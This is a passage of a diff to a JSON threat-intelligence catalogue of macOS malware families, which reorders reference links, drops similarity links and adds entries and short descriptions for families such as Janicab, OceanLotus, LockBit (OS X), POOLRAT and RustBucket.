- "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities"
+ "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html"
],
"synonyms": [
"FakeFlash"
@@ -8616,27 +9096,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly",
- "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
- "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
- "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
"https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/",
- "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/"
+ "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
+ "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
+ "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
+ "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
],
"synonyms": [
"Quimitchin"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "6a6525b9-4656-4973-ab45-588592395d0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597",
"value": "FruitFly"
},
@@ -8645,8 +9116,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.gimmick",
- "https://cybersecuritynews.com/gimmick-malware-attacks/",
- "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/"
+ "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/",
+ "https://cybersecuritynews.com/gimmick-malware-attacks/"
],
"synonyms": [],
"type": []
@@ -8659,8 +9130,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera",
- "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/",
+ "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/",
"https://objective-see.com/blog/blog_0x53.html"
],
"synonyms": [
@@ -8706,33 +9177,38 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab",
- "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html",
- "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/",
- "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/",
- "https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/",
- "https://archive.f-secure.com/weblog/archives/00002576.html",
- "https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/",
- "https://www.macmark.de/blog/osx_blog_2013-08-a.php",
- "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
- "https://www.malwarology.com/posts/5-janicab-part_1/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.interception",
+ "https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d4f7ea92-04e7-405c-9faf-7993ffd5c473",
+ "value": "Interception (OS X)"
+ },
+ {
+ "description": "According to Patrick Wardle, this malware persists a python script as a cron job. \r\nSteps: \r\n1. Python installer first saves any existing cron jobs into a temporary file named '/tmp/dump'. \r\n2. Appends its new job to this file.\r\n3. Once the new cron job has been added 'python (~/.t/runner.pyc)' runs every minute.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab",
+ "https://www.malwarology.com/posts/5-janicab-part_1/",
+ "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/",
+ "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/",
+ "https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/",
+ "https://archive.f-secure.com/weblog/archives/00002576.html",
+ "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/",
+ "https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/",
+ "https://www.macmark.de/blog/osx_blog_2013-08-a.php",
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c3c20c4b-e12a-42e5-960a-eea4644014f4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "01325d85-297f-40d5-b829-df9bd996af5a",
- "value": "Janicab"
+ "value": "Janicab (OS X)"
},
{
"description": "",
@@ -8754,10 +9230,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap",
- "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
- "https://objective-see.com/blog/blog_0x16.html",
"https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/",
- "https://github.com/eset/malware-ioc/tree/master/keydnap"
+ "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
+ "https://github.com/eset/malware-ioc/tree/master/keydnap",
+ "https://objective-see.com/blog/blog_0x16.html"
],
"synonyms": [],
"type": []
@@ -8785,10 +9261,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
- "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
"https://objective-see.com/blog/blog_0x16.html",
+ "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/"
],
"synonyms": [
@@ -8857,6 +9333,20 @@
"uuid": "15daa766-f721-4fd5-95fb-153f5361fb87",
"value": "Leverage"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.lockbit",
+ "https://twitter.com/malwrhunterteam/status/1647384505550876675",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0821b5c8-db48-4d0e-a969-384dbd74a6c9",
+ "value": "LockBit (OS X)"
+ },
{
"description": "",
"meta": {
@@ -8868,15 +9358,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "14f08f6f-7f58-48a8-8469-472244ffb571",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13",
"value": "MacDownloader"
},
@@ -8951,9 +9432,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt",
- "https://twitter.com/BitsOfBinary/status/1321488299932983296",
- "https://www.anquanke.com/post/id/223817",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.anquanke.com/post/id/223817",
+ "https://twitter.com/BitsOfBinary/status/1321488299932983296",
"https://twitter.com/BitsOfBinary/status/1337330286787518464"
],
"synonyms": [],
@@ -8967,8 +9448,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes",
- "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
"https://objective-see.com/blog/blog_0x16.html",
+ "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
"https://objective-see.com/blog/blog_0x53.html"
],
"synonyms": [],
@@ -8987,34 +9468,25 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4e2f0af2-6d2d-4a49-adc9-fae3745fcb72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405",
"value": "Mughthesec"
},
{
- "description": "",
+ "description": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus",
- "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
- "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html",
- "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/",
"https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/",
- "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/",
"https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/"
+ "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
+ "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
+ "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468",
+ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html"
],
"synonyms": [],
"type": []
@@ -9041,10 +9513,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.orat",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
"https://www.sentinelone.com/blog/from-the-front-lines-unsigned-macos-orat-malware-gambles-for-the-win/",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf"
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf"
],
"synonyms": [],
"type": []
@@ -9100,10 +9572,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit",
"http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
- "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
"https://forensicitguy.github.io/analyzing-pirrit-adware-installer/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf"
+ "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf",
+ "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
],
"synonyms": [],
"type": []
@@ -9111,20 +9583,34 @@
"uuid": "b749ff3a-df68-4b38-91f1-649864eae52c",
"value": "Pirrit"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.poolrat",
+ "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
+ "https://www.3cx.com/blog/news/mandiant-security-update2/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bfd9e30e-ddc7-426f-8f77-4d2e1a846541",
+ "value": "POOLRAT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat",
- "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
- "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
- "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
- "https://securelist.com/calisto-trojan-for-macos/86543/",
- "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
"https://objective-see.com/blog/blog_0x1F.html",
- "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
+ "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
+ "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
+ "https://securelist.com/calisto-trojan-for-macos/86543/",
+ "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
+ "https://objective-see.com/blog/blog_0x1D.html",
"https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf",
- "https://objective-see.com/blog/blog_0x1D.html"
+ "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
+ "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/"
],
"synonyms": [
"Calisto"
@@ -9144,15 +9630,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "29e52693-b325-4c14-93de-8f2ff9dca8bf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
"value": "Pwnet"
},
@@ -9162,9 +9639,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe",
"https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/",
+ "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
"https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
- "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/"
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga"
],
"synonyms": [
"Retefe"
@@ -9174,20 +9651,34 @@
"uuid": "80acc956-d418-42e3-bddf-078695a01289",
"value": "Dok"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.rustbucket",
+ "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "03f356e6-296f-4195-bed0-9719a84887db",
+ "value": "RustBucket"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer",
- "https://objective-see.com/blog/blog_0x64.html",
- "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/",
- "https://securelist.com/shlayer-for-macos/95724/",
- "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
- "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities"
+ "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
+ "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://objective-see.com/blog/blog_0x64.html",
+ "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
+ "https://securelist.com/shlayer-for-macos/95724/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/"
],
"synonyms": [],
"type": []
@@ -9200,8 +9691,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow",
- "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf"
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis"
],
"synonyms": [],
"type": []
@@ -9214,10 +9705,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.sysjoker",
- "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/",
+ "https://www.sentinelone.com/blog/sneaky-spies-and-backdoor-rats-sysjoker-and-dazzlespy-malware-target-macos/",
"https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
- "https://www.sentinelone.com/blog/sneaky-spies-and-backdoor-rats-sysjoker-and-dazzlespy-malware-target-macos/"
+ "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
+ "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/"
],
"synonyms": [],
"type": []
@@ -9230,9 +9721,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd",
- "https://securelist.com/windealer-dealing-on-the-side/105946/",
"https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
- "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
+ "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en",
+ "https://securelist.com/windealer-dealing-on-the-side/105946/"
],
"synonyms": [
"Demsty",
@@ -9275,10 +9766,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.update_agent",
- "https://twitter.com/sysopfb/status/1532442456343691273",
+ "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
"https://www.jamf.com/blog/updateagent-adapts-again/",
"https://www.esentire.com/blog/updateagent-macos-malware",
- "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/"
+ "https://twitter.com/sysopfb/status/1532442456343691273"
],
"synonyms": [],
"type": []
@@ -9306,8 +9797,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram",
"https://twitter.com/ConfiantIntel/status/1351559054565535745",
- "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/",
- "https://twitter.com/MsftSecIntel/status/1451279679059488773"
+ "https://twitter.com/MsftSecIntel/status/1451279679059488773",
+ "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/"
],
"synonyms": [
"WizardUpdate"
@@ -9336,13 +9827,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail",
- "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf",
- "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
"https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/",
"https://objective-see.com/blog/blog_0x3B.html",
"https://objective-see.com/blog/blog_0x3D.html",
- "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/"
+ "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf",
+ "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/",
+ "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/"
],
"synonyms": [],
"type": []
@@ -9382,9 +9873,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet",
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14",
"http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
- "https://objective-see.com/blog/blog_0x43.html",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14"
+ "https://objective-see.com/blog/blog_0x43.html"
],
"synonyms": [],
"type": []
@@ -9397,10 +9888,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent",
+ "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/",
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf",
"https://twitter.com/PhysicalDrive0/status/845009226388918273",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/"
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [],
"type": []
@@ -9413,14 +9904,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/",
- "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html",
- "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/",
- "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
"https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
- "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"
+ "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
+ "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
+ "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html",
+ "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/",
+ "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/"
],
"synonyms": [],
"type": []
@@ -9433,18 +9924,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader",
- "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
- "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
- "https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://twitter.com/krabsonsecurity/status/1319463908952969216",
- "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
- "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/",
"https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/",
- "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
+ "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
+ "https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/",
+ "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/",
+ "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
"https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption"
+ "https://twitter.com/krabsonsecurity/status/1319463908952969216",
+ "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/"
],
"synonyms": [
"Formbook"
@@ -9459,8 +9950,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd",
- "https://objective-see.com/blog/blog_0x16.html",
- "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html"
+ "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html",
+ "https://objective-see.com/blog/blog_0x16.html"
],
"synonyms": [],
"type": []
@@ -9473,8 +9964,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort",
- "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/",
- "https://objective-see.com/blog/blog_0x53.html"
+ "https://objective-see.com/blog/blog_0x53.html",
+ "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/"
],
"synonyms": [],
"type": []
@@ -9487,8 +9978,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru",
